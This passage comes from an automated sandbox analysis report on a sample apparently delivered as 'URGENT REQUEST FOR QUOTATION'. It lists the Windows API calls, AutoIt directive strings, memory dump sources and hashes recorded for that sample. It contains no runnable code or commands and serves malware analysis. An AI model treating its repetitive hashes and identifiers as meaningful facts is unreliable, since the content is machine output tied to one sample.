                                                                                                                      • Instruction Fuzzy Hash: 4B41C3716043019FEB20DF24D844F5ABBE8AF85320F00C61DF8A5972D2D770EA04DB52
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,000CCC08,00000000,?,?,?,?), ref: 000C44AA
                                                                                                                      • GetWindowLongW.USER32 ref: 000C44C7
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C44D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                                                                                                      • Instruction ID: 336237b4f661781fafe78a2d68ddaf31ae817c733c7363b18ac0f1336989168b
                                                                                                                      • Opcode Fuzzy Hash: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                                                                                                      • Instruction Fuzzy Hash: 27318931210605AFEB658F38DC45FEA7BA9FB08324F204329F979921E1D774AC509B50
                                                                                                                      APIs
                                                                                                                      • SysReAllocString.OLEAUT32(?,?), ref: 00096EED
                                                                                                                      • VariantCopyInd.OLEAUT32(?,?), ref: 00096F08
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00096F12
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$AllocClearCopyString
                                                                                                                      • String ID: *j
                                                                                                                      • API String ID: 2173805711-743776685
                                                                                                                      • Opcode ID: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
                                                                                                                      • Instruction ID: 8cfcc243ad2ddfd282dbd93ff14ef09722ecb6e1f23c561fe849f7a2e53a0696
                                                                                                                      • Opcode Fuzzy Hash: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
                                                                                                                      • Instruction Fuzzy Hash: 8A319172604245DFDF19AFA4E8A19FD37B5FF85304F1004A9F9038B2A2C7359916EB90
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,000B3077,?,?), ref: 000B3378
                                                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                                                                                                      • _wcslen.LIBCMT ref: 000B309B
                                                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 000B3106
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                      • String ID: 255.255.255.255
                                                                                                                      • API String ID: 946324512-2422070025
                                                                                                                      • Opcode ID: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
                                                                                                                      • Instruction ID: 127fe75fb20fe246c2b350602370887e5abc88330a9979ee3dae01aa58c5bd6d
                                                                                                                      • Opcode Fuzzy Hash: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
                                                                                                                      • Instruction Fuzzy Hash: 8531F1396002019FDB20DF28C895EEA77E4EF14318F348559E9169B392DB72EE45CB60
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000C4705
                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000C4713
                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000C471A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                      • Opcode ID: c90317a6cdccb7faa2bb752a64735539e376221d574c947a2858013827d8cd6b
                                                                                                                      • Instruction ID: 9c90a4b2d80dd4943057b60e4c428fbe639b8d72d48f621bfb7f32a21bfc567a
                                                                                                                      • Opcode Fuzzy Hash: c90317a6cdccb7faa2bb752a64735539e376221d574c947a2858013827d8cd6b
                                                                                                                      • Instruction Fuzzy Hash: E9215CB5604208AFEB11DF64DC91EAB37EDEB4A3A8B040159FA049B352CB71EC51CB60
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 176396367-2734436370
                                                                                                                      • Opcode ID: 34f3034ceb34be29e6342ab229bb91bcd081da1eb46b10a78f524d06f21b61b4
                                                                                                                      • Instruction ID: 23c89aa448047508f0bd41acb430e7c70bff1c73c61a1c03b371959c9136cddf
                                                                                                                      • Opcode Fuzzy Hash: 34f3034ceb34be29e6342ab229bb91bcd081da1eb46b10a78f524d06f21b61b4
                                                                                                                      • Instruction Fuzzy Hash: 3221087210461166DB31AB2C9C06FFB73EC9F51310F15842EFD499B182EB91AD45E3D6
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000C3840
                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000C3850
                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000C3876
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      • Opcode ID: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
                                                                                                                      • Instruction ID: d395cbe6f663a5f49a55d97b5dcb969ba84037de15fb957e6e1ce797427058ee
                                                                                                                      • Opcode Fuzzy Hash: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
                                                                                                                      • Instruction Fuzzy Hash: 1A218072614218BBEB219F54DC85FBF37AEEF89750F11C118F9049B190CA75DC5187A0
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A4A08
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000A4A5C
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,000CCC08), ref: 000A4AD0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                      • String ID: %lu
                                                                                                                      • API String ID: 2507767853-685833217
                                                                                                                      • Opcode ID: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
                                                                                                                      • Instruction ID: 57507fe0cacb4307998c63ad4f6938863bfe114f42313bf142506e0b2eab8307
                                                                                                                      • Opcode Fuzzy Hash: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
                                                                                                                      • Instruction Fuzzy Hash: 7E317175A00109AFDB10DF94C885EAEBBF8EF49308F1480A9F909DB252DB75ED45CB61
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000C424F
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000C4264
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000C4271
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
                                                                                                                      • Instruction ID: d8d699cca7211d41a32070363a306f84b08afe3b72ba0e8eae73ad57ad30cbb4
                                                                                                                      • Opcode Fuzzy Hash: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
                                                                                                                      • Instruction Fuzzy Hash: 0911E331240208BEEF215F68CC06FAB3BACFF85B54F014118FA55E6090D271D8519B10
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                                                        • Part of subcall function 00092DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                                                                                                        • Part of subcall function 00092DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                                                                                                        • Part of subcall function 00092DA7: GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                                                                                                        • Part of subcall function 00092DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                                                                                                      • GetFocus.USER32 ref: 00092F78
                                                                                                                        • Part of subcall function 00092DEE: GetParent.USER32(00000000), ref: 00092DF9
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00092FC3
                                                                                                                      • EnumChildWindows.USER32(?,0009303B), ref: 00092FEB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                      • String ID: %s%d
                                                                                                                      • API String ID: 1272988791-1110647743
                                                                                                                      • Opcode ID: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
                                                                                                                      • Instruction ID: 523073459d68a937e0de85b4852e807761efe5cce3e414993ebaf56ad49c1516
                                                                                                                      • Opcode Fuzzy Hash: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
                                                                                                                      • Instruction Fuzzy Hash: 8F11B171600205ABDF557F70CC99EEE77AAAF84304F048075FA099B293DF319949AF60
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58C1
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58EE
                                                                                                                      • DrawMenuBar.USER32(?), ref: 000C58FD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                                      • Opcode ID: 76e69c3d3c18bbc575e8838ebc405c0e3e47059282b9eb22cf5411be206fdf8c
                                                                                                                      • Instruction ID: be69ffd3be8a444052006dab63c08155f640a38589d7239bf7af95f98792f77c
                                                                                                                      • Opcode Fuzzy Hash: 76e69c3d3c18bbc575e8838ebc405c0e3e47059282b9eb22cf5411be206fdf8c
                                                                                                                      • Instruction Fuzzy Hash: C4016D75500218EFEB619F11DC44FAFBBB8FB45362F1080A9E849D6151DB349AC4DF21
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
                                                                                                                      • Instruction ID: 0d85e05ee286b1fa357207e2934b065315db61cefeb2533adf6f420106fd87f2
                                                                                                                      • Opcode Fuzzy Hash: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
                                                                                                                      • Instruction Fuzzy Hash: 38C12C75A00216EFDB14CFA4C894EAEB7B9FF48704F208598E905EB251D731EE41EB90
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1998397398-0
                                                                                                                      • Opcode ID: 477ba11900ac907c3489e579c58fb96267dcc74944d8000995ea2551ee86c1d3
                                                                                                                      • Instruction ID: 2a8f2c2791c7c124f814e4117f6a09aa34eb26c5ffeb50fd4a44948f24a7165f
                                                                                                                      • Opcode Fuzzy Hash: 477ba11900ac907c3489e579c58fb96267dcc74944d8000995ea2551ee86c1d3
                                                                                                                      • Instruction Fuzzy Hash: 12A16B756047009FCB15DF28C485EAAB7E9FF88714F148859F98A9B362DB70EE01CB91
                                                                                                                      APIs
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 000905F0
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 00090608
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,000CCC40,000000FF,?,00000000,00000800,00000000,?,000CFC08,?), ref: 0009062D
                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 0009064E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 314563124-0
                                                                                                                      • Opcode ID: 3d471b80baf066c20ec7d2ceeb8db011694d190943a39362c43ae715f3e2e239
                                                                                                                      • Instruction ID: 2d31c36415d8ce80d66d2b699a607ebf44a1fee05075cac0e18ac6178039e8d6
                                                                                                                      • Opcode Fuzzy Hash: 3d471b80baf066c20ec7d2ceeb8db011694d190943a39362c43ae715f3e2e239
                                                                                                                      • Instruction Fuzzy Hash: 6281F671A00109EFCF04DF94C988EEEB7B9FF89315F204598E516AB250DB71AE06DB60
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 269201875-0
                                                                                                                      • Opcode ID: 03b353b10826b8d29a62402c3bb337e9f7f33e75011819bbd36ae7ff9063b7d7
                                                                                                                      • Instruction ID: ccc4f12569830c1e2373e1118de8637cdcf02bd5cf356ba5651a44c485707e82
                                                                                                                      • Opcode Fuzzy Hash: 03b353b10826b8d29a62402c3bb337e9f7f33e75011819bbd36ae7ff9063b7d7
                                                                                                                      • Instruction Fuzzy Hash: CA414871E00501ABDB356BBC8C46AFE3AE5EF41370F248225F81DD32D3EA3C89415266
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(018BD9C0,?), ref: 000C62E2
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000C6315
                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 000C6382
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3880355969-0
                                                                                                                      • Opcode ID: 889c98171c8136d8c5efb7380aad6016e9270beb11f815b6181843ad178da9a8
                                                                                                                      • Instruction ID: ab0ce2fea6f6f1fddf5e3ef4e073f18c9d6a11bc13c14e60efa816a012c119b5
                                                                                                                      • Opcode Fuzzy Hash: 889c98171c8136d8c5efb7380aad6016e9270beb11f815b6181843ad178da9a8
                                                                                                                      • Instruction Fuzzy Hash: 4C514A70A00649AFDB20DF68D980EAE7BF5EB45360F10826DF8559B2A1D731AE81CB50
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 000B1AFD
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1B0B
                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 000B1B8A
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1B94
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
